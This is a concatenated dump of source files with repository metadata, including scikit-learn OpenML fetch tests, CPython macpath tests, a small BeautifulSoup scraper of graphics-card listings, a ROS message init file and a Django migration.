_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
_fetch_dataset_from_openml(data_id, data_name, data_version, target_column,
expected_observations, expected_features,
expected_missing,
np.float64, object, expect_sparse=False,
compare_default_target=True)
def test_decode_anneal(monkeypatch):
data_id = 2
_monkey_patch_webbased_functions(monkeypatch, data_id, False)
_test_features_list(data_id)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_anneal_multitarget(monkeypatch, gzip_response):
# classification dataset with numeric and categorical columns
data_id = 2
data_name = 'anneal'
data_version = 1
target_column = ['class', 'product-type', 'shape']
# Not all original instances included for space reasons
expected_observations = 11
expected_features = 36
expected_missing = 267
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
_fetch_dataset_from_openml(data_id, data_name, data_version, target_column,
expected_observations, expected_features,
expected_missing,
np.float64, object, expect_sparse=False,
compare_default_target=False)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_cpu(monkeypatch, gzip_response):
# regression dataset with numeric and categorical columns
data_id = 561
data_name = 'cpu'
data_version = 1
target_column = 'class'
expected_observations = 209
expected_features = 7
expected_missing = 0
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
_fetch_dataset_from_openml(data_id, data_name, data_version, target_column,
expected_observations, expected_features,
expected_missing,
np.float64, np.float64, expect_sparse=False,
compare_default_target=True)
def test_decode_cpu(monkeypatch):
data_id = 561
_monkey_patch_webbased_functions(monkeypatch, data_id, False)
_test_features_list(data_id)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_australian(monkeypatch, gzip_response):
# sparse dataset
# Australian is the only sparse dataset that is reasonably small
# as it is inactive, we need to catch the warning. Due to mocking
# framework, it is not deactivated in our tests
data_id = 292
data_name = 'Australian'
data_version = 1
target_column = 'Y'
# Not all original instances included for space reasons
expected_observations = 85
expected_features = 14
expected_missing = 0
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
assert_warns_message(
UserWarning,
"Version 1 of dataset Australian is inactive,",
_fetch_dataset_from_openml,
**{'data_id': data_id, 'data_name': data_name,
'data_version': data_version,
'target_column': target_column,
'expected_observations': expected_observations,
'expected_features': expected_features,
'expected_missing': expected_missing,
'expect_sparse': True,
'expected_data_dtype': np.float64,
'expected_target_dtype': object,
           'compare_default_target': False}  # numpy specific check
)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_adultcensus(monkeypatch, gzip_response):
# Check because of the numeric row attribute (issue #12329)
data_id = 1119
data_name = 'adult-census'
data_version = 1
target_column = 'class'
# Not all original instances included for space reasons
expected_observations = 10
expected_features = 14
expected_missing = 0
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
_fetch_dataset_from_openml(data_id, data_name, data_version, target_column,
expected_observations, expected_features,
expected_missing,
np.float64, object, expect_sparse=False,
compare_default_target=True)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_miceprotein(monkeypatch, gzip_response):
# JvR: very important check, as this dataset defined several row ids
# and ignore attributes. Note that data_features json has 82 attributes,
# and row id (1), ignore attributes (3) have been removed (and target is
# stored in data.target)
data_id = 40966
data_name = 'MiceProtein'
data_version = 4
target_column = 'class'
# Not all original instances included for space reasons
expected_observations = 7
expected_features = 77
expected_missing = 7
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
_fetch_dataset_from_openml(data_id, data_name, data_version, target_column,
expected_observations, expected_features,
expected_missing,
np.float64, object, expect_sparse=False,
compare_default_target=True)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_emotions(monkeypatch, gzip_response):
# classification dataset with multiple targets (natively)
data_id = 40589
data_name = 'emotions'
data_version = 3
target_column = ['amazed.suprised', 'happy.pleased', 'relaxing.calm',
'quiet.still', 'sad.lonely', 'angry.aggresive']
expected_observations = 13
expected_features = 72
expected_missing = 0
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
_fetch_dataset_from_openml(data_id, data_name, data_version, target_column,
expected_observations, expected_features,
expected_missing,
np.float64, object, expect_sparse=False,
compare_default_target=True)
def test_decode_emotions(monkeypatch):
data_id = 40589
_monkey_patch_webbased_functions(monkeypatch, data_id, False)
_test_features_list(data_id)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_open_openml_url_cache(monkeypatch, gzip_response, tmpdir):
data_id = 61
_monkey_patch_webbased_functions(
monkeypatch, data_id, gzip_response)
openml_path = sklearn.datasets._openml._DATA_FILE.format(data_id)
cache_directory = str(tmpdir.mkdir('scikit_learn_data'))
# first fill the cache
response1 = _open_openml_url(openml_path, cache_directory)
# assert file exists
location = _get_local_path(openml_path, cache_directory)
assert os.path.isfile(location)
# redownload, to utilize cache
response2 = _open_openml_url(openml_path, cache_directory)
assert response1.read() == response2.read()
@pytest.mark.parametrize('gzip_response', [True, False])
@pytest.mark.parametrize('write_to_disk', [True, False])
def test_open_openml_url_unlinks_local_path(
monkeypatch, gzip_response, tmpdir, write_to_disk):
data_id = 61
openml_path = sklearn.datasets._openml._DATA_FILE.format(data_id)
cache_directory = str(tmpdir.mkdir('scikit_learn_data'))
location = _get_local_path(openml_path, cache_directory)
def _mock_urlopen(request):
if write_to_disk:
with open(location, "w") as f:
f.write("")
raise ValueError("Invalid request")
monkeypatch.setattr(sklearn.datasets._openml, 'urlopen', _mock_urlopen)
with pytest.raises(ValueError, match="Invalid request"):
_open_openml_url(openml_path, cache_directory)
assert not os.path.exists(location)
def test_retry_with_clean_cache(tmpdir):
data_id = 61
openml_path = sklearn.datasets._openml._DATA_FILE.format(data_id)
cache_directory = str(tmpdir.mkdir('scikit_learn_data'))
location = _get_local_path(openml_path, cache_directory)
os.makedirs(os.path.dirname(location))
with open(location, 'w') as f:
f.write("")
@_retry_with_clean_cache(openml_path, cache_directory)
def _load_data():
# The first call will raise an error since location exists
if os.path.exists(location):
raise Exception("File exist!")
return 1
warn_msg = "Invalid cache, redownloading file"
with pytest.warns(RuntimeWarning, match=warn_msg):
result = _load_data()
assert result == 1
def test_retry_with_clean_cache_http_error(tmpdir):
data_id = 61
openml_path = sklearn.datasets._openml._DATA_FILE.format(data_id)
cache_directory = str(tmpdir.mkdir('scikit_learn_data'))
@_retry_with_clean_cache(openml_path, cache_directory)
def _load_data():
raise HTTPError(url=None, code=412,
msg='Simulated mock error',
hdrs=None, fp=None)
error_msg = "Simulated mock error"
with pytest.raises(HTTPError, match=error_msg):
_load_data()
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_cache(monkeypatch, gzip_response, tmpdir):
def _mock_urlopen_raise(request):
        raise ValueError('This mechanism intends to test correct cache '
                         'handling. As such, urlopen should never be '
                         'accessed. URL: %s' % request.get_full_url())
data_id = 2
cache_directory = str(tmpdir.mkdir('scikit_learn_data'))
_monkey_patch_webbased_functions(
monkeypatch, data_id, gzip_response)
X_fetched, y_fetched = fetch_openml(data_id=data_id, cache=True,
data_home=cache_directory,
return_X_y=True)
monkeypatch.setattr(sklearn.datasets._openml, 'urlopen',
_mock_urlopen_raise)
X_cached, y_cached = fetch_openml(data_id=data_id, cache=True,
data_home=cache_directory,
return_X_y=True)
np.testing.assert_array_equal(X_fetched, X_cached)
np.testing.assert_array_equal(y_fetched, y_cached)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_notarget(monkeypatch, gzip_response):
data_id = 61
target_column = None
expected_observations = 150
expected_features = 5
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
data = fetch_openml(data_id=data_id, target_column=target_column,
cache=False)
assert data.data.shape == (expected_observations, expected_features)
assert data.target is None
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_inactive(monkeypatch, gzip_response):
# fetch inactive dataset by id
data_id = 40675
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
glas2 = assert_warns_message(
UserWarning, "Version 1 of dataset glass2 is inactive,", fetch_openml,
data_id=data_id, cache=False)
# fetch inactive dataset by name and version
assert glas2.data.shape == (163, 9)
glas2_by_version = assert_warns_message(
UserWarning, "Version 1 of dataset glass2 is inactive,", fetch_openml,
data_id=None, name="glass2", version=1, cache=False)
assert int(glas2_by_version.details['id']) == data_id
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_nonexisting(monkeypatch, gzip_response):
# there is no active version of glass2
data_id = 40675
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
# Note that we only want to search by name (not data id)
assert_raise_message(ValueError, "No active dataset glass2 found",
fetch_openml, name='glass2', cache=False)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_raises_illegal_multitarget(monkeypatch, gzip_response):
data_id = 61
targets = ['sepalwidth', 'class']
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
# Note that we only want to search by name (not data id)
assert_raise_message(ValueError,
"Can only handle homogeneous multi-target datasets,",
fetch_openml, data_id=data_id,
target_column=targets, cache=False)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_warn_ignore_attribute(monkeypatch, gzip_response):
data_id = 40966
expected_row_id_msg = "target_column={} has flag is_row_identifier."
expected_ignore_msg = "target_column={} has flag is_ignore."
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
# single column test
assert_warns_message(UserWarning, expected_row_id_msg.format('MouseID'),
fetch_openml, data_id=data_id,
target_column='MouseID',
cache=False)
assert_warns_message(UserWarning, expected_ignore_msg.format('Genotype'),
fetch_openml, data_id=data_id,
target_column='Genotype',
cache=False)
# multi column test
assert_warns_message(UserWarning, expected_row_id_msg.format('MouseID'),
fetch_openml, data_id=data_id,
target_column=['MouseID', 'class'],
cache=False)
assert_warns_message(UserWarning, expected_ignore_msg.format('Genotype'),
fetch_openml, data_id=data_id,
target_column=['Genotype', 'class'],
cache=False)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_string_attribute_without_dataframe(monkeypatch, gzip_response):
data_id = 40945
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
# single column test
assert_raise_message(ValueError,
('STRING attributes are not supported for '
'array representation. Try as_frame=True'),
fetch_openml, data_id=data_id, cache=False)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_dataset_with_openml_error(monkeypatch, gzip_response):
data_id = 1
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
assert_warns_message(
UserWarning,
"OpenML registered a problem with the dataset. It might be unusable. "
"Error:",
fetch_openml, data_id=data_id, cache=False
)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_dataset_with_openml_warning(monkeypatch, gzip_response):
data_id = 3
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
assert_warns_message(
UserWarning,
"OpenML raised a warning on the dataset. It might be unusable. "
"Warning:",
fetch_openml, data_id=data_id, cache=False
)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_illegal_column(monkeypatch, gzip_response):
data_id = 61
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
assert_raise_message(KeyError, "Could not find target_column=",
fetch_openml, data_id=data_id,
target_column='undefined', cache=False)
assert_raise_message(KeyError, "Could not find target_column=",
fetch_openml, data_id=data_id,
target_column=['undefined', 'class'],
cache=False)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_raises_missing_values_target(monkeypatch, gzip_response):
data_id = 2
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
assert_raise_message(ValueError, "Target column ",
fetch_openml, data_id=data_id, target_column='family')
def test_fetch_openml_raises_illegal_argument():
assert_raise_message(ValueError, "Dataset data_id=",
fetch_openml, data_id=-1, name="name")
assert_raise_message(ValueError, "Dataset data_id=",
fetch_openml, data_id=-1, name=None,
version="version")
assert_raise_message(ValueError, "Dataset data_id=",
fetch_openml, data_id=-1, name="name",
version="version")
assert_raise_message(ValueError, "Neither name nor data_id are provided. "
"Please provide name or data_id.", fetch_openml)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_with_ignored_feature(monkeypatch, gzip_response):
# Regression test for #14340
# 62 is the ID of the ZOO dataset
data_id = 62
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
dataset = sklearn.datasets.fetch_openml(data_id=data_id, cache=False)
assert dataset is not None
# The dataset has 17 features, including 1 ignored (animal),
# so we assert that we don't have the ignored feature in the final Bunch
assert dataset['data'].shape == (101, 16)
assert 'animal' not in dataset['feature_names']
| [
"[email protected]"
] | |
4f17b9642923971d36bd340e30cf3088aa9e4934 | 55540f3e86f1d5d86ef6b5d295a63518e274efe3 | /toolchain/riscv/MSYS/python/Lib/test/test_macpath.py | 09609c89ed3cbbeca84d8e94c33db3bb69321b4a | [
"bzip2-1.0.6",
"LicenseRef-scancode-proprietary-license",
"OpenSSL",
"Python-2.0",
"LicenseRef-scancode-newlib-historical",
"TCL",
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] | permissive | bouffalolab/bl_iot_sdk | bc5eaf036b70f8c65dd389439062b169f8d09daa | b90664de0bd4c1897a9f1f5d9e360a9631d38b34 | refs/heads/master | 2023-08-31T03:38:03.369853 | 2023-08-16T08:50:33 | 2023-08-18T09:13:27 | 307,347,250 | 244 | 101 | Apache-2.0 | 2023-08-28T06:29:02 | 2020-10-26T11:16:30 | C | UTF-8 | Python | false | false | 6,503 | py | from test import test_genericpath
import unittest
import warnings
with warnings.catch_warnings():
warnings.filterwarnings("ignore", "the macpath module is deprecated",
DeprecationWarning)
import macpath
class MacPathTestCase(unittest.TestCase):
def test_abspath(self):
self.assertEqual(macpath.abspath("xx:yy"), "xx:yy")
def test_isabs(self):
isabs = macpath.isabs
self.assertTrue(isabs("xx:yy"))
self.assertTrue(isabs("xx:yy:"))
self.assertTrue(isabs("xx:"))
self.assertFalse(isabs("foo"))
self.assertFalse(isabs(":foo"))
self.assertFalse(isabs(":foo:bar"))
self.assertFalse(isabs(":foo:bar:"))
self.assertTrue(isabs(b"xx:yy"))
self.assertTrue(isabs(b"xx:yy:"))
self.assertTrue(isabs(b"xx:"))
self.assertFalse(isabs(b"foo"))
self.assertFalse(isabs(b":foo"))
self.assertFalse(isabs(b":foo:bar"))
self.assertFalse(isabs(b":foo:bar:"))
def test_split(self):
split = macpath.split
self.assertEqual(split("foo:bar"),
('foo:', 'bar'))
self.assertEqual(split("conky:mountpoint:foo:bar"),
('conky:mountpoint:foo', 'bar'))
self.assertEqual(split(":"), ('', ''))
self.assertEqual(split(":conky:mountpoint:"),
(':conky:mountpoint', ''))
self.assertEqual(split(b"foo:bar"),
(b'foo:', b'bar'))
self.assertEqual(split(b"conky:mountpoint:foo:bar"),
(b'conky:mountpoint:foo', b'bar'))
self.assertEqual(split(b":"), (b'', b''))
self.assertEqual(split(b":conky:mountpoint:"),
(b':conky:mountpoint', b''))
def test_join(self):
join = macpath.join
self.assertEqual(join('a', 'b'), ':a:b')
self.assertEqual(join(':a', 'b'), ':a:b')
self.assertEqual(join(':a:', 'b'), ':a:b')
self.assertEqual(join(':a::', 'b'), ':a::b')
self.assertEqual(join(':a', '::b'), ':a::b')
self.assertEqual(join('a', ':'), ':a:')
self.assertEqual(join('a:', ':'), 'a:')
self.assertEqual(join('a', ''), ':a:')
self.assertEqual(join('a:', ''), 'a:')
self.assertEqual(join('', ''), '')
self.assertEqual(join('', 'a:b'), 'a:b')
self.assertEqual(join('', 'a', 'b'), ':a:b')
self.assertEqual(join('a:b', 'c'), 'a:b:c')
self.assertEqual(join('a:b', ':c'), 'a:b:c')
self.assertEqual(join('a', ':b', ':c'), ':a:b:c')
self.assertEqual(join('a', 'b:'), 'b:')
self.assertEqual(join('a:', 'b:'), 'b:')
self.assertEqual(join(b'a', b'b'), b':a:b')
self.assertEqual(join(b':a', b'b'), b':a:b')
self.assertEqual(join(b':a:', b'b'), b':a:b')
self.assertEqual(join(b':a::', b'b'), b':a::b')
self.assertEqual(join(b':a', b'::b'), b':a::b')
self.assertEqual(join(b'a', b':'), b':a:')
self.assertEqual(join(b'a:', b':'), b'a:')
self.assertEqual(join(b'a', b''), b':a:')
self.assertEqual(join(b'a:', b''), b'a:')
self.assertEqual(join(b'', b''), b'')
self.assertEqual(join(b'', b'a:b'), b'a:b')
self.assertEqual(join(b'', b'a', b'b'), b':a:b')
self.assertEqual(join(b'a:b', b'c'), b'a:b:c')
self.assertEqual(join(b'a:b', b':c'), b'a:b:c')
self.assertEqual(join(b'a', b':b', b':c'), b':a:b:c')
self.assertEqual(join(b'a', b'b:'), b'b:')
self.assertEqual(join(b'a:', b'b:'), b'b:')
def test_splitext(self):
splitext = macpath.splitext
self.assertEqual(splitext(":foo.ext"), (':foo', '.ext'))
self.assertEqual(splitext("foo:foo.ext"), ('foo:foo', '.ext'))
self.assertEqual(splitext(".ext"), ('.ext', ''))
self.assertEqual(splitext("foo.ext:foo"), ('foo.ext:foo', ''))
self.assertEqual(splitext(":foo.ext:"), (':foo.ext:', ''))
self.assertEqual(splitext(""), ('', ''))
self.assertEqual(splitext("foo.bar.ext"), ('foo.bar', '.ext'))
self.assertEqual(splitext(b":foo.ext"), (b':foo', b'.ext'))
self.assertEqual(splitext(b"foo:foo.ext"), (b'foo:foo', b'.ext'))
self.assertEqual(splitext(b".ext"), (b'.ext', b''))
self.assertEqual(splitext(b"foo.ext:foo"), (b'foo.ext:foo', b''))
self.assertEqual(splitext(b":foo.ext:"), (b':foo.ext:', b''))
self.assertEqual(splitext(b""), (b'', b''))
self.assertEqual(splitext(b"foo.bar.ext"), (b'foo.bar', b'.ext'))
def test_ismount(self):
ismount = macpath.ismount
self.assertEqual(ismount("a:"), True)
self.assertEqual(ismount("a:b"), False)
self.assertEqual(ismount("a:b:"), True)
self.assertEqual(ismount(""), False)
self.assertEqual(ismount(":"), False)
self.assertEqual(ismount(b"a:"), True)
self.assertEqual(ismount(b"a:b"), False)
self.assertEqual(ismount(b"a:b:"), True)
self.assertEqual(ismount(b""), False)
self.assertEqual(ismount(b":"), False)
def test_normpath(self):
normpath = macpath.normpath
self.assertEqual(normpath("a:b"), "a:b")
self.assertEqual(normpath("a"), ":a")
self.assertEqual(normpath("a:b::c"), "a:c")
self.assertEqual(normpath("a:b:c:::d"), "a:d")
self.assertRaises(macpath.norm_error, normpath, "a::b")
self.assertRaises(macpath.norm_error, normpath, "a:b:::c")
self.assertEqual(normpath(":"), ":")
self.assertEqual(normpath("a:"), "a:")
self.assertEqual(normpath("a:b:"), "a:b")
self.assertEqual(normpath(b"a:b"), b"a:b")
self.assertEqual(normpath(b"a"), b":a")
self.assertEqual(normpath(b"a:b::c"), b"a:c")
self.assertEqual(normpath(b"a:b:c:::d"), b"a:d")
self.assertRaises(macpath.norm_error, normpath, b"a::b")
self.assertRaises(macpath.norm_error, normpath, b"a:b:::c")
self.assertEqual(normpath(b":"), b":")
self.assertEqual(normpath(b"a:"), b"a:")
self.assertEqual(normpath(b"a:b:"), b"a:b")
class MacCommonTest(test_genericpath.CommonTest, unittest.TestCase):
pathmodule = macpath
test_relpath_errors = None
if __name__ == "__main__":
unittest.main()
| [
"[email protected]"
] | |
7cfa8bc5f3f464ee75f8482cc31e6b0550228649 | f73241e87cef9250d8e6a3648b23920dddccb19f | /Web Scrape.py | 85c7f9f0bceec54ec321a0cabcdd18b23c736d6e | [] | no_license | roshanpokhrel/webscrape | cf39c6826913c2e01490797e3a48943574eddcaf | 23f3e07b14bbd6ea5ee1b8d5f21e4a7b7b7b1657 | refs/heads/master | 2020-03-25T17:17:05.148421 | 2018-08-08T06:36:22 | 2018-08-08T06:36:22 | 143,971,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,370 | py | from urllib.request import urlopen as uReq
from bs4 import BeautifulSoup as soup
my_url = 'https://www.newegg.com/Video-Cards-Video-Devices/Category/ID-38?Tpk=graphics%20card'
# opening up a connection, grabbing the page
uClient = uReq(my_url)
# offloads contents into variable
page_html = uClient.read()
# close the connection
uClient.close()
# html parsing
page_soup = soup(page_html, "html.parser")
# print(page_soup.h1)
# print(page_soup.p)
# print(page_soup.body)
# Find all div that have the class item-container
containers = page_soup.findAll("div", {"class":"item-container"})
#print(len(containers))
#print(containers[0])
# Open a csv file to write to
filename = "products_name.csv"
f = open(filename, "w")
headers = "brand, product_name, shipping\n"
f.write(headers)
for container in containers:
brand = container.div.div.a.img["title"] #Who makes this graphics card
title_container = container.findAll("a", {"class":"item-title"})
product_name = title_container[0].text
shipping_container = container.findAll("li", {"class": "price-ship"})
    shipping = shipping_container[0].text.strip()  # strip to remove surrounding whitespace
f.write(brand + ',' + product_name.replace(",", "|") + ',' + shipping + '\n')
# print("My brand is:" + brand)
# print("My Product is:" + product_name)
# print("My shipping detail is:" + shipping)
f.close() | [
"[email protected]"
] | |
bdd85e097c2d83b1fa81fe61ddc8d6a2508d83d0 | fe9935b08e22fc019fbcfd6c0bc37ab235e2a0e2 | /catkin_ws/devel/lib/python3/dist-packages/suruiha_gazebo_plugins/msg/__init__.py | 47936db23aedbd75e93835ebb9ed84b9da5ba4b5 | [] | no_license | abdussametkaradeniz/RosLessonsAndTutorials | ce22a06d8a881d949479956ea6aa06ff9f8bf41b | 940597350f5ed85244696ec44fe567fd89a6d5d8 | refs/heads/main | 2023-07-18T22:56:52.075918 | 2021-09-07T21:42:24 | 2021-09-07T21:42:24 | 404,125,607 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 140 | py | from ._UAVBattery import *
from ._UAVMessage import *
from ._UAVScore import *
from ._UAVSensorMessage import *
from ._UAVTracking import *
| [
"[email protected]"
] | |
ce0d6c9dabd06a703319e21717d1378c7980e8d9 | 9d35a44bd264258fc306c622e1097f637988638a | /shortnr/bookmarks/migrations/0004_auto_20160405_0334.py | 3def50627d8aed2a9864fbaa008a26134ef36c2f | [] | no_license | D4VEB/urly-bird | fca75ea8888895b6a84dff73a931007af45de0e6 | 906de245acd5cd45883928ffb415791efbd32c01 | refs/heads/master | 2021-01-12T20:00:30.126945 | 2016-04-07T20:13:35 | 2016-04-07T20:13:35 | 55,182,743 | 0 | 0 | null | 2016-03-31T21:02:19 | 2016-03-31T21:02:19 | null | UTF-8 | Python | false | false | 475 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-04-05 10:34
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bookmarks', '0003_auto_20160405_0319'),
]
operations = [
migrations.AlterField(
model_name='bookmark',
name='pub_date',
field=models.DateTimeField(auto_now=True, db_index=True),
),
]
| [
"[email protected]"
] |